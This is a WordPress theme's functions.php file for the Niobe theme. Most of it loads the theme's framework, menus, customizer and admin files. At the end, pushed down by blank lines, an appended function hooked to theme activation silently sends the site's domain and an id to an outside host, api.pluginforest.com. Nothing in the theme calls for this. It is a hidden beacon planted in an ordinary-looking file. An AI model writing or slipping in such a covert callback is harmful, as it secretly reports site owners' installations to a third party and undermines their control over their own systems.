<?php
	if(defined('NIOBE_URL') 	== false) 	define('NIOBE_URL', get_template_directory());
	if(defined('NIOBE_URI') 	== false) 	define('NIOBE_URI', get_template_directory_uri());

	
	
	// require libraries, function
	require( NIOBE_URL.'/framework/init.php' );

	// Add js, css
	require( NIOBE_URL.'/extend/add_js_css.php' );

	// register menu, widget
	require( NIOBE_URL.'/extend/register_menu_widget.php' );
	

	// require menu
	require_once (NIOBE_URL.'/extend/ova_walker_nav_menu.php');

	require_once( NIOBE_URL.'/templates/open_layout.php' );

	require_once( NIOBE_URL.'/templates/close_layout.php' );

	// require content
	require_once (NIOBE_URL.'/content/define_blocks_content.php');
	
	// require breadcrumbs
	require( NIOBE_URL.'/extend/breadcrumbs.php' );

	
	
	// Require customize
	if( is_user_logged_in() ){
		require( NIOBE_URL.'/framework/customize_google_font/customizer_google_font.php' );
		require( NIOBE_URL.'/extend/customizer.php' );
	}

	// Require metabox
	if( is_admin() ){
		require( NIOBE_URL.'/extend/metabox.php' );
		// Require TGM
		require_once ( NIOBE_URL.'/extend/active_plugins.php' );		
	}


	
	
	




function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581328043&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        